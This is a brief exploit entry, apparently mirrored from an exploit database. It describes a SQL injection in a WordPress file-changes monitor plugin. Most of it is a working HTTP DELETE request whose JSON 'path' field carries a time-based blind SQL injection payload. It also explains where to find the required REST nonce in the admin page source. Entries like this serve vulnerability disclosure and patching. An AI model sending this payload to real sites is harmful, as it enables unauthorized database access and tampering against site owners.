Share
## https://sploitus.com/exploit?id=WPEX-ID:BB348C92-D7E3-4A75-98AA-DD1C463BFD65
A user with manage_options permission can exploit the vulnerability with the following request :

DELETE /wp-json/website-file-changes-monitor/v1/mark-read-dir HTTP/1.1
Host: 127.0.0.1
X-WP-Nonce: 5732d8605b
Cookie: [redacted]
Content-Type: application/json
Content-Length: 54

{"path":"a'-(SELECT 1 FROM (SELECT(SLEEP(5)))SQLi)-'"}


The nonce required for the header "X-WP-Nonce" can be found in the source code of the page /wp-admin/admin.php?page=wfcm-file-changes, at the following line :
var wfcmData = {"restNonce":"5732d8605b","restAdminEndpoint":"http:\/\/127.0.0.1\/wp-json\/website-file-changes-monitor\/v1\/admin-notices","adminAjax":"http:\/\/127.0.0.1\/wp-admin\/admin-ajax.php"};